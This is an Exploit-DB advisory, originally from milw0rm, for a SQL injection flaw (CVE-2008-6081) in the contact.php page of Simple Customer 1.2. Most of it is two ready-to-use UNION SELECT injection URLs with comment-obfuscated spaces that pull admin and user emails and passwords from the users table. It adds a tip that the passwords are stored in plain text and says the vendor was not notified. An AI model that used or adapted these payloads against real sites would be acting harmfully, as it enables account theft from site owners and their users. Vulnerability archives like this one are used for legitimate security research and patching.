Simple Customer 1.2 - 'contact.php' SQL Injection
Author: t0pP8uZz
type: webapps
platform: php
port:
date_added: 2008-04-17
date_updated: 2016-11-24
verified: 1
codes: OSVDB-51862;CVE-2008-6081
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comsimple-customer.zip
--==+================================================================================+==--
--==+ Simple Customer 1.2 SQL Injection Vulnerabilitys +==--
--==+================================================================================+==--
Discovered By: t0pP8uZz
Discovered On: 18 April 2008
Script Download: http://www.simplecustomer.com/download?file=1
DORK: N/A
Vendor Has Not Been Notified!
DESCRIPTION:
Simple Customer is vulnerable due to MULTIPLE insecure mysql querys the querys take php $_GET variables and does
not do any sanitizing at all.
below are 2 sql injections, the first one will display admin user/pass
SQL Injection:
ADMIN: http://site.com/contact.php?id=1/**/UNION/**/ALL/**/SELECT/**/1,CONCAT(user_email,char(58),user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/FROM/**/users/**/WHERE/**/user_level=1/*
USER: http://site.com/contact.php?id=1/**/UNION/**/ALL/**/SELECT/**/1,CONCAT(user_email,char(58),user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/FROM/**/users/**/LIMIT/**/0,1/*
NOTE/TIP:
passwords in plain text
GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew !
--==+================================================================================+==--
--==+ Simple Customer 1.2 SQL Injection Vulnerabilitys +==--
--==+================================================================================+==--
# milw0rm.com [2008-04-18]